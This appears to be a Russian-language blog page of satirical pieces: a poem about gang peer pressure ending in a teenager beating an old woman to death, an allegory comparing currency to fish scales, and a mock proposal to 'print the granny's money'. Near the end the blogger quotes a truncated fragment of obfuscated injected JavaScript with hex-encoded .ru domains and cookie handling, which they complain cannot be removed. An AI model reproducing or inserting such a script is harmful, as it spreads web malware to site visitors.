Мы в дружбе были кажется равны...
- Ты посипака. Если правым хуком
Не двинешь этой старой бабке в ухо,
То будешь лох , изгой в глазах братвы.
- За что мне бабку бить? На кой и нафига?..
- Мы так договорились с пацанами.
Что слабакам не место в нашей стае.
А кто слабак - мы сами порешаем
И сами кстати выберем врага.
Кого предателем назначим кого браком,
Кого лохом и словом "посипака" -
Обидный термин, хуже петуха.
Ведь кто не с нами - однозначно против,
Не уважает, нос от нас воротит...
Как побратимы выдержат такое? 
Мы отщепенца выделим в изгои,
Мы - сила, отщепенец - кака,
Опущенец и снова посипака - 
Суров и скор пацанский приговор.

На тонкой ниточке соплей повис пацанчик,
На слове как кузнечик на игле
Туда-сюда изъёрзался в игре
И пожелтел как в мае одуванчик.

- Я понял,пацаны. Иду на бабку.
Она мне кто? И я ей не под шапку,
Не жалко если так стоит вопрос
(и кстати, надо бабке двинуть в нос)...
Сейчас я ей! Смотрите, друганы!

Старушка без малейшей задней мысли,
Наивна и доверчива до свиста
На свист и обернулась невзначай.
А тут летит тинейджер "Получай!" - 
И бьет мадам в лицо бейсбольной битой.
Как будто в схватке честной и открытой
Врубил героя наш герой стиха.

Он не похож отныне на лоха,
На посипаку и на слабака,
Не отщепенец, нет! Ну а бабулька
Раздробленным лицом слегка побулькав
Скончалась быстро в лужице из крови.

Пацан с другими пацанами вровень,
Плечом к плечу равняет коллектив.
Кто с ними - молодец, кто супротив -
Тот посипака. Как же тут иначе,
Кого-то надо в слабаки назначить
И подравнять пацанскую мораль.

Она как газ, как правая педаль -
Надавишь посильней и станешь первым,
Скривив кукиш из совести и нервов
Оставишь отстающих горько плакать,
Плевать на остающихся и жертвы.
Акцептовав условия оферты -
Не лох отныне, не слабак, не посипака!..




*здесь - прихвостень, приспешник, пассивная хвостовая часть коллектива

так и быть про рыбок

Плывет по водоему такая рыбка. Не в кулинарном виде плывет, а в натуральном. То есть плывет система, состоящая из: мышц, связок, органов пищеварения, навигации, управления, размножения и так далее и тому подобное. Между прочим в ней могут быть паразиты, черви всякие и заболевания разные.
 Плывет она среди течений разной степени прозрачности, питательности и интенсивности. Преодолевает наша рыбка течения, ориентируется в них, уклоняется от опасностей разночинных и хавает рыбий корм ртом. Эти процессы достаточно сложные, а значит организм должен быть заточен на выполнение столь непростой задачи. Но он заточен. Каждым органом, каждой функцией, каждым импульсом и рефлексом и каждой клеточкой тела. В том числе и каждой чешуйкой своей поверхности. А вот о чешуе стоит обмолвиться отдельно.
Нацвалюта - это фрагмент, отпечаток, кусочек, чешуйка той рыбы, которая скрывается в толще экономики
Если рыба растет, то увеличение числа чешуи на нее существенного влияния не оказывает. Если прибавка чешуи пропорциональна всем остальным частям рыбы. Но  если вдруг рыбе поплохело, она худеет, заглистявилась и попала в сеть, то увеличением количества чешуи никакого спасительного эффекта она достичь не сможет. Только сильней запутается и изойдёт чешуёй. Скажем удвоение количества денег чешуи на квадратный сантиметр поверхности серьезно ухудшит гидродинамические свойства организма, а утроение скажется на подвижности вообще. И будет плыть по течению такой себе чешуйчатый комок не в силах ни добычу догнать ни от опасности увернуться.

Вот такая чешуёвая экономика, если вы поняли о чем сказ.


как отжать бабки из банки жадной бабки

Родион Раскольников, отойди от экрана!

Вот, Родя отошел. Теперь можно спокойно поговорить о сравнительно бескровном отъеме бабулетов у жлобской старушенции.
Замечу сразу, бабульку мы топориком рихтовать не станем. Мы цивилизованные люди и живем в самом демократишном обществе на планете. Именно из-за этого нам и нужны бабулеты, которые эта карга припрятала у себя. Для демократии нужны, для экономики и победы бабла над злом. А бабульке они вовсе не нужны. Нет, ну подумайте - зачем этой старой сморщенной женщине столько денег? Она наверняка не станет покупать яхты, айфоны и новые шмотки; не отправится путешествовать на Гоа, на Елисейские поля или на Алтай; не пойдет отдыхать в ночной клуб на пенную вечеринку или в пенный на ночную. Короче, бабулька для циркуляции денег человек полностью бесполезный. Она как собака на сене - лежит на бабках, сама не ест и другим не дает, дрянь такая!
Но Родиона мы выгнали. А значит решили обнести бабку другим способом, без топора. Обнести и поехать наконец на в...Ростов, на пенную вечеринку. На своем Роллс Ройсе, между прочим. С музыкой! Кого знают в Ростове может поехать в Таганрог. Но бабки у бабки на это дело полюбасу отжать нужно - это дело решенное...
Итак, бабку мы пальцем не трогаем, близко к ней не подходим, а бутылек у нее потрошим. Как это сделать?
А очень просто!



Для этого достаточно напечатать точно такие бабулеты как у бабки и выдать их за бабкины!
Гэниально, не правда ли?!
Вы можете возразить что держава, то есть эмиссионный центр, будет против, можете сказать что нас повяжут и посодют...
Да, могут. По-беспределу у нас могут посадить кого угодно - демократию мы уже обсудили. Но если разобраться логически, то державе мы никакого урона не наносим, денег из бюджета не просим и даже наоборот поднимаем экономику державы на невиданную высоту. Ведь у бабки бабки лежали мертвым грузом, а у нас они закрутились; у бабки бабки не работали, а у нас заработали; бабка с бабок налог державе не платила, а мы заплатим. Честно-честно! Всякие НДСы, пенсионные отчисления заплотим и даже 1,5% на фронт отправить поможем. Разве мы не молодцы? Молодцы безусловные. И даже герои!!
Но об этом после и чуть скромнее...



Вот эта гадость ничем не убирается.
Уж и в службу поддержки обращался и на горячую линию сбу звонил и даже путину пытался набрать, да номера не знаю. Скауль...


window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20231",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for



5%, 1 голос

11%, 2 голоси

26%, 5 голосів

0%, 0 голосів

11%, 2 голоси

47%, 9 голосів
Авторизуйтеся, щоб проголосувати.